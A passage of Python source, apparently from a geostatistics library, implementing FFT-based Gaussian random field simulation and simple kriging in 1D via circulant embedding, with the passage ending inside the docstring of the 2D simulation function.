ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (2-dimensional array of dim nreal x n) nreal GRFs
with n = nx if crop = True, and n >= nx otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of a vector x of length N is given by
c = DFT(x) = F * x
where F is the N x N matrix with coefficients
F(j,k) = [exp(-i*2*pi*j*k/N)], 0 <= j,k <= N-1
We have
F^(-1) = 1/N * F^(*)
where ^(*) denotes the conjugate transpose
Let
Q = 1/N^(1/2) * F
Then Q is unitary, i.e. Q^(-1) = Q^(*)
Then, we have
DFT = F = N^(1/2) * Q
DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
Using numpy package in python3, we have
numpy.fft.fft() = DFT
numpy.fft.ifft() = DFT^(-1)
"""
# Check first argument and get covariance function
if cov_model.__class__.__name__ == 'function':
# covariance function is given
cov_func = cov_model
range_known = False
elif cov_model.__class__.__name__ == 'CovModel1D':
cov_func = cov_model.func() # covariance function
range_known = True
else:
print("ERROR: 'cov_model' (first argument) is not valid")
return
# Number of realization(s)
nreal = int(nreal) # cast to int if needed
if nreal <= 0:
if printInfo:
print('GRF1D: nreal = 0: nothing to do!')
return()
if printInfo:
print('GRF1D: Preliminary computation...')
#### Preliminary computation ####
nx = dimension
dx = spacing
# ox = origin
if method not in (1, 2, 3):
print('ERROR (GRF1D): invalid method')
return
if x is not None:
if conditioningMethod not in (1, 2):
print('ERROR (GRF1D): invalid method for conditioning')
return
x = np.asarray(x).reshape(-1) # cast in 1-dimensional array if needed
v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed
mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
if mean.size not in (1, nx):
print('ERROR (GRF1D): number of entry for "mean"...')
return
if var is not None:
var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
if var.size not in (1, nx):
print('ERROR (GRF1D): number of entry for "var"...')
return
if not crop:
if x is not None: # conditional simulation
print('ERROR (GRF1D): "no crop" is not valid with conditional simulation')
return
if mean.size > 1:
print('ERROR (GRF1D): "no crop" is not valid with non stationary mean')
return
if var is not None and var.size > 1:
print('ERROR (GRF1D): "no crop" is not valid with non stationary variance')
return
if extensionMin is None:
# default extensionMin
if range_known:
# ... based on range of covariance model
extensionMin = extension_min(cov_model.r(), nx, s=dx)
else:
# ... based on dimension
extensionMin = dimension - 1
Nmin = nx + extensionMin
if printInfo:
print('GRF1D: Computing circulant embedding...')
# Circulant embedding of the covariance matrix
# --------------------------------------------
# The embedding matrix is a circulant matrix of size N x N, computed from
# the covariance function.
# To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
# we choose
# N = 2^g (a power of 2), with N >= Nmin
g = int(np.ceil(np.log2(Nmin)))
N = int(2**g)
if printInfo:
print('GRF1D: Embedding dimension: {}'.format(N))
# ccirc: coefficient of the embedding matrix (first line), vector of size N
L = int (N/2)
h = np.arange(-L, L, dtype=float) * dx # [-L ... 0 ... L-1] * dx
ccirc = cov_func(h)
del(h)
# ...shift first L index to the end of the axis, i.e.:
# [-L ... 0 ... L-1] -> [0 ... L-1 -L ... -1]
ind = np.arange(L)
ccirc = ccirc[np.hstack((ind+L, ind))]
del(ind)
if printInfo:
print('GRF1D: Computing FFT of circulant matrix...')
# Compute the Discrete Fourier Transform (DFT) of ccric, via FFT
# --------------------------------------------------------------
# The DFT coefficients
# lam = DFT(ccirc) = (lam(0),lam(1),...,lam(N-1))
# are the eigen values of the embedding matrix.
# We have:
# a) lam are real coefficients, because the embedding matrix is symmetric
# b) lam(k) = lam(N-k), k=1,...,N-1, because the coefficients ccirc are real
lam = np.real(np.fft.fft(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
if x is None or conditioningMethod == 1:
del(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(0.))
# Dealing with conditioning
# -------------------------
if x is not None:
if printInfo:
print('GRF1D: Treatment of conditioning data...')
# Compute the part rAA of the covariance matrix
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
if printInfo:
print('GRF1D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int)
if sum(indc < 0) > 0 or sum(indc >= nx):
print('ERROR (GRF1D): a conditioning point is out of the grid')
return
if len(np.unique(indc)) != len(x):
print('ERROR (GRF1D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(indc[j]-indc[i], N)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF1D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nx), indc), dtype=int)
nnc = len(indnc)
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF1D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
k = np.mod(indc[j] - indnc, N)
rBA[:,j] = ccirc[k]
if printInfo:
print('GRF1D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA, rBA)
# If a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# Hence, if a non stationary variance is specified,
# the matrix rBA * rAA^(-1) should be consequently updated
# by multiplying its columns by 1/varUpdate[indc] and its rows by varUpdate[indnc]
if var is not None and var.size > 1:
rBArAAinv = np.transpose(varUpdate[indnc] * np.transpose(1./varUpdate[indc] * rBArAAinv))
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if printInfo:
print('GRF1D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = indc
indncEmb = indnc
del(ccirc)
#### End of preliminary computation ####
# Unconditional simulation
# ========================
# Method A: Generating one real GRF Z
# --------
# 1. Generate a real gaussian white noise W ~ N(0,1) on G (1D grid)
# 2. Compute Z = Q^(*) D Q * W
# [OR: Z = Q D Q^(*) * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = DFT^(-1)(D * DFT(W))
# [OR: Z = DFT(D * DFT^(-1)(W))]
#
# Method B: Generating one real GRF Z
# --------
# 1. Assuming N=2L even, generate
# V1 = (V1(1),...,V1(L-1)) ~ 1/sqrt(2) N(0, 1)
# V2 = (V2(1),...,V2(L-1)) ~ 1/sqrt(2) N(0, 1)
# and set
# X = (X(0),...,X(N-1)) on G
# with
# X(0) ~ N(0,1)
# X(L) ~ N(0,1)
# and
# X(k) = V1(k) + i V2(k)
# X(N-k) = V1(k) - i V2(k)
# for k = 1,...,L-1
# 2. Compute Z = Q^(*) D * X
# [OR: Z = Q D * X], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * X)
# [OR: Z = 1/N^(1/2) * DFT(D * X]
#
# Method C: Generating two independent real GRFs Z1, Z2
# --------
# (If nreal is odd, the last realization is generated using method A.)
# 1. Generate two independent real gaussian white noises W1,W2 ~ N(0,1) on G (1D grid)
# and let W = W1 + i * W2 (complex value)
# 2. Compute Z = Q^(*) D * W
# [OR: Z = Q D * W], where
# Q is normalized DFT matrix
# D = diag(lamSqrt)
# i.e:
# Z = N^(1/2) * DFT^(-1)(D * W)
# [OR: Z = 1/N^(1/2) * DFT(D * W)]
# Then the real and imaginary parts of Z are two independent GRFs
if crop:
grfNx = nx
else:
grfNx = N
grf = np.zeros((nreal, grfNx))
if method == 1:
# Method A
# --------
for i in range(nreal):
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
W = np.random.normal(size=N)
Z = np.fft.ifft(lamSqrt * np.fft.fft(W))
# ...note that Im(Z) = 0
grf[i] = np.real(Z[0:grfNx])
elif method == 2:
# Method B
# --------
for i in range(nreal):
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
X1 = np.zeros(N)
X2 = np.zeros(N)
X1[[0,L]] = np.random.normal(size=2)
X1[range(1,L)] = 1./np.sqrt(2) * np.random.normal(size=L-1)
X1[list(reversed(range(L+1,N)))] = X1[range(1,L)]
X2[range(1,L)] = 1./np.sqrt(2) * np.random.normal(size=L-1)
X2[list(reversed(range(L+1,N)))] = - X2[range(1,L)]
X = np.array(X1, dtype=complex)
X.imag = X2
Z = np.sqrt(N) * np.fft.ifft(lamSqrt * X)
grf[i] = np.real(Z[0:grfNx])
elif method == 3:
# Method C
# --------
for i in np.arange(0, nreal-1, 2):
if printInfo:
print('GRF1D: Unconditional simulation {:4d}-{:4d} of {:4d}...'.format(i+1, i+2, nreal))
W = np.array(np.random.normal(size=N), dtype=complex)
W.imag = np.random.normal(size=N)
Z = np.sqrt(N) * np.fft.ifft(lamSqrt * W)
# Z = 1/sqrt(N) * np.fft.fft(lamSqrt * W)] # see above: [OR:...]
grf[i] = np.real(Z[0:grfNx])
grf[i+1] = np.imag(Z[0:grfNx])
if np.mod(nreal, 2) == 1:
if printInfo:
print('GRF1D: Unconditional simulation {:4d} of {:4d}...'.format(nreal, nreal))
W = np.random.normal(size=N)
Z = np.fft.ifft(lamSqrt * np.fft.fft(W))
grf[nreal-1] = np.real(Z[0:grfNx])
if var is not None:
grf = varUpdate * grf
grf = mean + grf
# Conditional simulation
# ----------------------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, from an unconditional simulation Z, we retrieve a conditional
# simulation ZCond as follows.
# Let
# ZCond[A] = Zobs
# ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
if x is not None:
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('GRF1D: Updating conditional simulations...')
# Update all simulations at a time,
# use the matrix rBA * rAA^(-1) already computed
grf[:,indnc] = grf[:,indnc] + np.transpose(np.dot(rBArAAinv, np.transpose(v - grf[:,indc])))
grf[:,indc] = v
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
# Update each simulation successively as follows:
# - solve rAA * x = Zobs - z[A]
# - do the multiplication rBA * x via the circulant embedding of the
# covariance matrix (using fft)
rAAinvResiduEmb = np.zeros(N)
for i in range(nreal):
if printInfo:
print('GRF1D: Updating conditional simulation {:4d} of {:4d}...'.format(i+1, nreal))
# Compute residue
residu = v - grf[i,indc]
# ... update if non stationary variance is specified
if var is not None and var.size > 1:
residu = 1./varUpdate[indc] * residu
# Compute
# x = rAA^(-1) * residu, and then
# Z = rBA * x via the circulant embedding of the covariance matrix
rAAinvResiduEmb[indcEmb] = np.linalg.solve(rAA, residu)
Z = np.fft.ifft(lam * np.fft.fft(rAAinvResiduEmb))
# ...note that Im(Z) = 0
Z = np.real(Z[indncEmb])
# ... update if non stationary covariance is specified
if var is not None and var.size > 1:
Z = varUpdate[indnc] * Z
grf[i, indnc] = grf[i, indnc] + Z
grf[i, indc] = v
return (grf)
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def krige1D(x, v, cov_model, dimension, spacing, origin=0.,
            mean=0, var=None,
            extensionMin=None,
            conditioningMethod=1, # note: set conditioningMethod=2 if unable to allocate memory
            measureErrVar=0., tolInvKappa=1.e-10,
            computeKrigSD=True,
            printInfo=True):
    """
    Computes kriging estimates and standard deviation in 1D via FFT.
    It is a simple kriging
        - of value v at location x,
        - based on the covariance model / function,
        - with a specified mean (mean) and variance (var), which can be non stationary
    Notes:
    1) For reproducing covariance model, the dimension of the field/domain should be large
    enough; let K an integer such that K*spacing is greater or equal to the
    correlation range, then
        - correlation across opposite border should be removed by extending
            the domain sufficiently, i.e.
                extensionMin >= K - 1
        - two nodes could not be correlated simultaneously regarding both distances
            between them (with respect to the periodic grid), i.e. one should have
                dimension+extensionMin >= 2*K - 1,
        To sum up, extensionMin should be chosen such that
            dimension+extensionMin >= max(dimension, K) + K - 1
        i.e.
            extensionMin >= max(K-1,2*K-dimension-1)
    2) For large data set:
        - conditioningMethod should be set to 2 for using FFT
        - measureErrVar could be set to a small positive value to stabilize
            the covariance matrix (solving linear system)
    :param x:          (1-dimensional array of float) coordinate of data points
    :param v:          (1-dimensional array of float) value at data points
    :param cov_model:  covariance model, it can be:
                            (function) covariance function f(h), where
                                h: (1-dimensional array or float) are 1D-lag(s)
                            (CovModel1D class) covariance model in 1D, see
                                definition of the class in module geone.covModel
    :param dimension:  (int) nx, number of cells
    :param spacing:    (float) dx, spacing between two adjacent cells
    :param origin:     (float) ox, origin of the 1D field
                            - used for localizing the conditioning points
    :param mean:       (float or ndarray) mean of the variable:
                            - scalar for stationary mean
                            - ndarray for non stationary mean, must contain
                                nx values (reshaped if needed)
    :param var:        (float or ndarray or None) variance of the variable,
                            if not None: variance in the field is updated
                            depending on the specified variance and the covariance
                            function, otherwise: only the covariance function is
                            used
                                - scalar for stationary variance
                                - array for non stationary variance, must contain
                                    nx values (reshaped if needed)
    :param extensionMin: (int) minimal extension in nodes for embedding (see above)
                            None for default (automatically computed, based
                            on the range if covariance model class is given
                            as third argument)
    :param conditioningMethod:
                        (int) indicates which method is used to perform kriging.
                            Let
                                A: index of conditioning (data) nodes
                                B: index of non-conditioning nodes
                            and
                                    +         +
                                    | rAA rAB |
                                r = |         |
                                    | rBA rBB |
                                    +         +
                            the covariance matrix, where index A (resp. B) refers
                            to conditioning (resp. non-conditioning) index in the
                            grid. Then, the kriging estimates and variance are
                                krig[B]    = mean + rBA * rAA^(-1) * (v - mean)
                                krigVar[B] = diag(rBB - rBA * rAA^(-1) * rAB)
                            The computation is done in a way depending on the
                            following possible values for conditioningMethod:
                                1: method ConditioningA:
                                    the matrices rBA, rAA^(-1) are explicitly
                                    computed (warning: could require large amount
                                    of memory)
                                2: method ConditioningB:
                                    for kriging estimates:
                                        the linear system
                                            rAA * y = (v - mean)
                                        is solved, and then
                                            mean + rBA*y
                                        is computed
                                    for kriging variances:
                                        for each column u[j] of rAB, the linear
                                        system
                                            rAA * y = u[j]
                                        is solved, and then
                                            rBB[j,j] - y^t*y
                                        is computed
    :param measureErrVar:
                        (float >=0) measurement error variance; we assume that
                            the error on conditioning data follows the distribution
                            N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
                            considered instead of rAA for stabilizing the linear
                            system for this matrix.
    :param tolInvKappa: (float >0) the function is stopped if the inverse of
                            the condition number of rAA is above tolInvKappa
    :param computeKrigSD:
                        (bool) indicates if the standard deviation of kriging is computed
    :param printInfo:   (bool) indicates if some info is printed in stdout
    :return ret:        two possible cases:
                            ret = [krig, krigSD] if computeKrigSD is equal to True
                            ret = krig           if computeKrigSD is equal to False
                        where
                            krig:   (1-dimensional array of dim nx)
                                        kriging estimates
                            krigSD: (1-dimensional array of dim nx)
                                        kriging standard deviation
    NOTES:
        Discrete Fourier Transform (DFT) of a vector x of length N is given by
            c = DFT(x) = F * x
        where F is the N x N matrix with coefficients
            F(j,k) = [exp(-i*2*pi*j*k/N)], 0 <= j,k <= N-1
        We have
            F^(-1) = 1/N * F^(*)
        where ^(*) denotes the conjugate transpose
        Let
            Q = 1/N^(1/2) * F
        Then Q is unitary, i.e. Q^(-1) = Q^(*)
        Then, we have
            DFT = F = N^(1/2) * Q
            DFT^(-1) = 1/N * F^(*) = 1/N^(1/2) * Q^(*)
        Using numpy package in python3, we have
            numpy.fft.fft() = DFT
            numpy.fft.ifft() = DFT^(-1)
    """
    # Check third argument and get covariance function
    if cov_model.__class__.__name__ == 'function':
        # covariance function is given directly
        cov_func = cov_model
        range_known = False
    elif cov_model.__class__.__name__ == 'CovModel1D':
        cov_func = cov_model.func() # covariance function
        range_known = True
    else:
        print("ERROR: 'cov_model' (third argument) is not valid")
        return

    # Check conditioning method
    if conditioningMethod not in (1, 2):
        print('ERROR (KRIGE1D): invalid method!')
        return

    nx = dimension
    dx = spacing
    # ox = origin

    x = np.asarray(x).reshape(-1) # cast in 1-dimensional array if needed
    v = np.asarray(v).reshape(-1) # cast in 1-dimensional array if needed

    mean = np.asarray(mean).reshape(-1) # cast in 1-dimensional array if needed
    if mean.size not in (1, nx):
        print('ERROR (KRIGE1D): number of entry for "mean"...')
        return

    if var is not None:
        var = np.asarray(var).reshape(-1) # cast in 1-dimensional array if needed
        if var.size not in (1, nx):
            print('ERROR (KRIGE1D): number of entry for "var"...')
            return

    if extensionMin is None:
        # default extensionMin
        if range_known:
            # ... based on range of covariance model
            extensionMin = extension_min(cov_model.r(), nx, s=dx)
        else:
            # ... based on dimension
            extensionMin = dimension - 1

    Nmin = nx + extensionMin

    if printInfo:
        print('KRIGE1D: Computing circulant embedding...')

    # Circulant embedding of the covariance matrix
    # --------------------------------------------
    # The embedding matrix is a circulant matrix of size N x N, computed from
    # the covariance function.
    # To take a maximal benefit of Fast Fourier Transform (FFT) for computing DFT,
    # we choose
    #     N = 2^g (a power of 2), with N >= Nmin
    g = int(np.ceil(np.log2(Nmin)))
    N = int(2**g)

    if printInfo:
        print('KRIGE1D: Embedding dimension: {}'.format(N))

    # ccirc: coefficient of the embedding matrix (first line), vector of size N
    L = N // 2
    h = np.arange(-L, L, dtype=float) * dx # [-L ... 0 ... L-1] * dx
    ccirc = cov_func(h)
    del h

    # ...shift first L index to the end of the axis, i.e.:
    #    [-L ... 0 ... L-1] -> [0 ... L-1 -L ... -1]
    ind = np.arange(L)
    ccirc = ccirc[np.hstack((ind+L, ind))]
    del ind

    if printInfo:
        print('KRIGE1D: Computing FFT of circulant matrix...')

    # Compute the Discrete Fourier Transform (DFT) of ccirc, via FFT
    # --------------------------------------------------------------
    # The DFT coefficients
    #   lam = DFT(ccirc) = (lam(0),lam(1),...,lam(N-1))
    # are the eigen values of the embedding matrix.
    # We have:
    #   a) lam are real coefficients, because the embedding matrix is symmetric
    #   b) lam(k) = lam(N-k), k=1,...,N-1, because the coefficients ccirc are real
    lam = np.real(np.fft.fft(ccirc))
    # ...note that the imaginary parts are equal to 0

    # Eventual use of approximate embedding
    # -------------------------------------
    # If some DFT coefficients are negative, then set them to zero
    # and update them to fit the marginals distribution (approximate embedding)
    if np.min(lam) < 0:
        lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
    # note: unlike in the simulation functions, the square root of lam is not
    # needed here (kriging uses the covariance itself, not its "square root")

    # For specified variance
    # ----------------------
    # Compute updating factor
    if var is not None:
        varUpdate = np.sqrt(var/cov_func(0.))

    # Kriging
    # -------
    # Let
    #    A: index of conditioning nodes
    #    B: index of non-conditioning nodes
    # and
    #        +         +
    #        | rAA rAB |
    #    r = |         |
    #        | rBA rBB |
    #        +         +
    # the covariance matrix, where index A (resp. B) refers to
    # conditioning (resp. non-conditioning) index in the grid.
    #
    # Then, the kriging estimates are
    #     mean + rBA * rAA^(-1) * (v - mean)
    # and the kriging standard deviation
    #     diag(rBB - rBA * rAA^(-1) * rAB)
    # Note: if a variance var is specified, then the matrix r should be updated
    # by the following operation:
    #    diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
    # which is accounted for in the computation of kriging estimates and
    # standard deviation below

    if printInfo:
        print('KRIGE1D: Computing covariance matrix (rAA) for conditioning locations...')

    # indc: node index of conditioning node (nearest node)
    indc = np.asarray(np.floor((x-origin)/spacing), dtype=int)
    if np.any(indc < 0) or np.any(indc >= nx):
        print('ERROR (KRIGE1D): a conditioning point is out of the grid')
        return
    if len(np.unique(indc)) != len(x):
        print('ERROR (KRIGE1D): more than one conditioning point in a same grid cell')
        return  # abort: duplicated indices would make rAA (near) singular / results meaningless

    nc = len(x)

    # rAA: covariance between pairs of conditioning nodes, read from the
    # circulant embedding (distance taken modulo N); measureErrVar stabilizes
    # the diagonal (nugget-like term)
    rAA = np.zeros((nc, nc))
    diagEntry = ccirc[0] + measureErrVar
    for i in range(nc):
        rAA[i,i] = diagEntry
        for j in range(i+1, nc):
            rAA[i,j] = ccirc[np.mod(indc[j]-indc[i], N)]
            rAA[j,i] = rAA[i,j]

    # Test if rAA is almost singular...
    if 1./np.linalg.cond(rAA) < tolInvKappa:
        print('ERROR (KRIGE1D): conditioning issue: condition number of matrix rAA is too big')
        return

    # indnc: node index of non-conditioning nodes
    indnc = np.asarray(np.setdiff1d(np.arange(nx), indc), dtype=int)
    nnc = len(indnc)

    # Initialize
    krig = np.zeros(nx)
    if computeKrigSD:
        krigSD = np.zeros(nx)

    # Center the data values (and normalize them if a non stationary variance
    # is specified); the mean (and variance factor) is restored at the end
    if mean.size == 1:
        v = v - mean
    else:
        v = v - mean[indc]

    if var is not None and var.size > 1:
        v = 1./varUpdate[indc] * v

    if conditioningMethod == 1:
        # Method ConditioningA
        # --------------------
        if printInfo:
            print('KRIGE1D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')

        # Compute the parts rBA of the covariance matrix (see above)
        rBA = np.zeros((nnc, nc))
        for j in range(nc):
            k = np.mod(indc[j] - indnc, N)
            rBA[:,j] = ccirc[k]

        del ccirc

        if printInfo:
            print('KRIGE1D: Computing rBA * rAA^(-1)...')

        # compute rBA * rAA^(-1)
        rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))

        del rAA
        if not computeKrigSD:
            del rBA

        # Compute kriging estimates
        if printInfo:
            print('KRIGE1D: computing kriging estimates...')

        krig[indnc] = np.dot(rBArAAinv, v)
        krig[indc] = v

        if computeKrigSD:
            # Compute kriging standard deviation
            if printInfo:
                print('KRIGE1D: computing kriging standard deviation ...')

            # diag(rBA * rAA^(-1) * rAB), computed as row-wise dot products
            krigSD[indnc] = np.sum(rBArAAinv * rBA, axis=1)
            krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))

            del rBA

    elif conditioningMethod == 2:
        # Method ConditioningB
        # --------------------
        if not computeKrigSD:
            del ccirc

        if printInfo:
            print('KRIGE1D: Computing index in the embedding grid for non-conditioning / conditioning locations...')

        # Compute index in the embedding grid for indc and indnc
        # (to allow use of fft)
        indcEmb = indc
        indncEmb = indnc

        # Compute kriging estimates
        if printInfo:
            print('KRIGE1D: computing kriging estimates...')

        # Compute
        #    u = rAA^(-1) * v, and then
        #    Z = rBA * u via the circulant embedding of the covariance matrix
        uEmb = np.zeros(N)
        uEmb[indcEmb] = np.linalg.solve(rAA, v)
        Z = np.fft.ifft(lam * np.fft.fft(uEmb))
        # ...note that Im(Z) = 0
        krig[indnc] = np.real(Z[indncEmb])
        krig[indc] = v

        if computeKrigSD:
            # Compute kriging standard deviation
            if printInfo:
                print('KRIGE1D: computing kriging standard deviation ...')

            for j in range(nnc):
                u = ccirc[np.mod(indc - indnc[j], N)] # j-th row of rBA
                krigSD[indnc[j]] = np.dot(u, np.linalg.solve(rAA, u))

            del ccirc

            krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))

    # ... update if non stationary covariance is specified
    if var is not None:
        if var.size > 1:
            krig = varUpdate * krig
            if computeKrigSD:
                krigSD = varUpdate * krigSD

    krig = krig + mean

    if computeKrigSD:
        return [krig, krigSD]
    else:
        return krig
# ----------------------------------------------------------------------------
# ----------------------------------------------------------------------------
def grf2D(cov_model, dimension, spacing, origin=[0., 0.],
nreal=1, mean=0, var=None,
x=None, v=None,
extensionMin=None, crop=True,
method=3, conditioningMethod=2,
measureErrVar=0., tolInvKappa=1.e-10,
printInfo=True):
"""
Generates gaussian random fields (GRF) in 2D via FFT.
The GRFs:
- are generated using the given covariance model / function,
- have specified mean (mean) and variance (var), which can be non stationary
- are conditioned to location x with value v
Notes:
1) For reproducing covariance model, the dimension of GRF should be large
enough; let K an integer such that K*spacing is greater or equal to the
correlation range, then
- correlation accross opposite border should be removed by extending
the domain sufficiently, i.e.
extensionMin >= K - 1
- two nodes could not be correlated simultaneously regarding both distances
between them (with respect to the periodic grid), i.e. one should have
i.e. one should have
dimension+extensionMin >= 2*K - 1,
To sum up, extensionMin should be chosen such that
dimension+extensionMin >= max(dimension, K) + K - 1
i.e.
extensionMin >= max(K-1,2*K-dimension-1)
2) For large conditional simulations with large data set:
- conditioningMethod should be set to 2 for using FFT in conditioning step
- measureErrVar could be set to a small positive value to stabilize
the covariance matrix for conditioning locations (solving linear system)
:param cov_model: covariance model, it can be:
(function) covariance function f(h), where
h: (2-dimensional array of dim n x 2, or
1-dimensional array of dim 2) are 2D-lag(s)
(CovModel2D class) covariance model in 2D, see
definition of the class in module geone.covModel
:param dimension: (sequence of 2 ints) [nx, ny], number of cells
in x-, y-axis direction
:param spacing: (sequence of 2 float) [dx, dy], spacing between
two adjacent cells in x-, y-axis direction
:param origin: (sequence of 2 float) [ox, oy], origin of the 2D field
- used for localizing the conditioning points
:param nreal: (int) number of realizations
:param mean: (float or ndarray) mean of the GRF:
- scalar for stationary mean
- ndarray for non stationary mean, must contain
nx*ny values (reshaped if needed)
:param var: (float or ndarray or None) variance of the GRF,
if not None: variance of GRF is updated
depending on the specified variance and the covariance
function, otherwise: only the covariance function is
used
- scalar for stationary variance
- array for non stationary variance, must contain
nx*ny values (reshaped if needed)
:param x: (2-dimensional array of dim n x 2, or
1-dimensional array of dim 2 or None) coordinate of
conditioning points (None for unconditional GRF)
:param v: (1-dimensional array or float or None) value at
conditioning points (length n)
:param extensionMin: (sequence of 2 ints) minimal extension in nodes in
in x-, y-axis direction for embedding (see above)
None for default (automatically computed, based
on the ranges if covariance model class is given
as first argument)
:param crop: (bool) indicates if the extended generated field will
be cropped to original dimension; note that no cropping
is not valid with conditioning or non stationary mean
or variance
:param method: (int) indicates which method is used to generate
unconditional simulations; for each method the DFT "lam"
of the circulant embedding of the covariance matrix is
used, and periodic and stationary GRFs are generated;
possible values:
1: method A:
generate one GRF Z as follows:
- generate one real gaussian white noise W
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
2: method B: NOT IMPLEMENTED!!!
generate one GRF Z as follows:
- generate directly X (of method A)
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z
3: method C:
generate two independent GRFs Z1, Z2 as follows:
- generate two independant real gaussian white
noises W1, W2 and set W = W1 + i * W2
- apply fft (or fft inverse) on W to get X
- multiply X by lam (term by term)
- apply fft inverse (or fft) to get Z,
and set Z1 = Re(Z), Z2 = Im(Z)
note: if nreal is odd, the last field is
generated using method A
:param conditioningMethod:
(int) indicates which method is used to update simulation
for accounting conditioning data.
Let
A: index of conditioning nodes
B: index of non-conditioning nodes
Zobs: vector of values of the unconditional
simulation Z at conditioning nodes
and
+ +
| rAA rAB |
r = | |
| rBA rBB |
+ +
the covariance matrix, where index A (resp. B) refers
to conditioning (resp. non-conditioning) index in the
grid. Then, an unconditional simulation Z is updated
into a conditional simulation ZCond as follows:
Let
ZCond[A] = Zobs
ZCond[B] = Z[B] + rBA * rAA^(-1) * (Zobs - Z[A])
(that is the update consists in adding the kriging
estimates of the residues to the unconditional
simulation); possible values for conditioningMethod:
1: method CondtioningA:
the matrix M = rBA * rAA^(-1) is explicitly
computed (warning: could require large amount
of memory), then all the simulations are updated
by a sum and a multiplication by the matrix M
2: method ConditioningB:
for each simulation: the linear system
rAA * x = Zobs - Z[A]
is solved and then, the multiplication by rBA
is done via fft
:param measureErrVar:
(float >=0) measurement error variance; we assume that
the error on conditioining data follows the distrubution
N(0,measureErrVar*I); i.e. rAA + measureErrVar*I is
considered instead of rAA for stabilizing the linear
system for this matrix.
(Ignored if x is None, i.e. unconditional simulations)
:param tolInvKappa: (float >0) used only for conditioning, the simulation is
stopped if the inverse of the condition number of rAA
is above tolInvKappa
:param printInfo: (bool) indicates if some info is printed in stdout
:return grf: (3-dimensional array of dim nreal x n2 x n1) nreal GRFs
with n1 = nx, n2 = ny if crop = True,
and n1 >= nx, n2 >= ny otherwise;
grf[i] is the i-th realization
NOTES:
Discrete Fourier Transform (DFT) of an array x of dim N1 x N2 is given by
c = DFT(x) = F * x
where F is the the (N1*N2) x (N1*N2) matrix with coefficients
